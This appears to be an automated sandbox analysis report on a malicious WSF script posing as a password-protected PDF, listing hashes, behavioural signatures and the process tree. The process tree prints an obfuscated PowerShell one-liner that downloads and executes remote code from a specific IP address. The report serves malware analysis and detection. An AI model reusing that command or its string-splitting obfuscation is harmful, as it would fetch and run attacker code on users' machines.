Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
06-06-2023 14:23
Static task
static1
Behavioral task
behavioral1
Sample
Adoc-PDFPasswordedaround_V16AEYj.wsf
Resource
win7-20230220-en
windows7-x64
5 signatures
150 seconds
General
-
Target
Adoc-PDFPasswordedaround_V16AEYj.wsf
-
Size
198KB
-
MD5
238ead4420470bac07e1f77e789af46b
-
SHA1
ed5a3f475ff87fa5ebc994404c83b8d8afea1aec
-
SHA256
0024eeff7a3739674fa0c70d7ede07f8b763a795fe05e3908e058cb1d10ac2c3
-
SHA512
55326e40fca8c6908b9d939bb628a065e615a490cfc6491e511c797e1f350ddfecc55df0cac6d60d9812aaa1d70c7965444437145dc7d0a3d0855c056a264bbc
-
SSDEEP
384:13XU3XU3XU3XU3XU3XU3XU3XU3XU3XU3XU3Xcp3XU3XU3XU3XU3XU3XU3XU3XU3o:y
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 1392 WScript.exe 4 1820 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1820 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1392 wrote to memory of 1820 1392 WScript.exe powershell.exe PID 1392 wrote to memory of 1820 1392 WScript.exe powershell.exe PID 1392 wrote to memory of 1820 1392 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Adoc-PDFPasswordedaround_V16AEYj.wsf"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $s3='IeX(NeW-OBJeCT NeT.W';$kds='eBCLIeNT).DOWNLO';Sleep 2;[BYTe[]];Sleep 3;$HJDRRRUY='kdsa4(''http://195.178.120.137:222/d.jpg'')'.RePLACe('kdsa4','ADSTRING');Sleep 1;IeX($s3+$kds+$HJDRRRUY);2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1820-63-0x0000000002950000-0x00000000029D0000-memory.dmpFilesize
512KB
-
memory/1820-62-0x0000000002950000-0x00000000029D0000-memory.dmpFilesize
512KB
-
memory/1820-61-0x000000001B290000-0x000000001B572000-memory.dmpFilesize
2.9MB
-
memory/1820-64-0x00000000022F0000-0x00000000022F8000-memory.dmpFilesize
32KB
-
memory/1820-65-0x0000000002950000-0x00000000029D0000-memory.dmpFilesize
512KB
-
memory/1820-66-0x0000000002950000-0x00000000029D0000-memory.dmpFilesize
512KB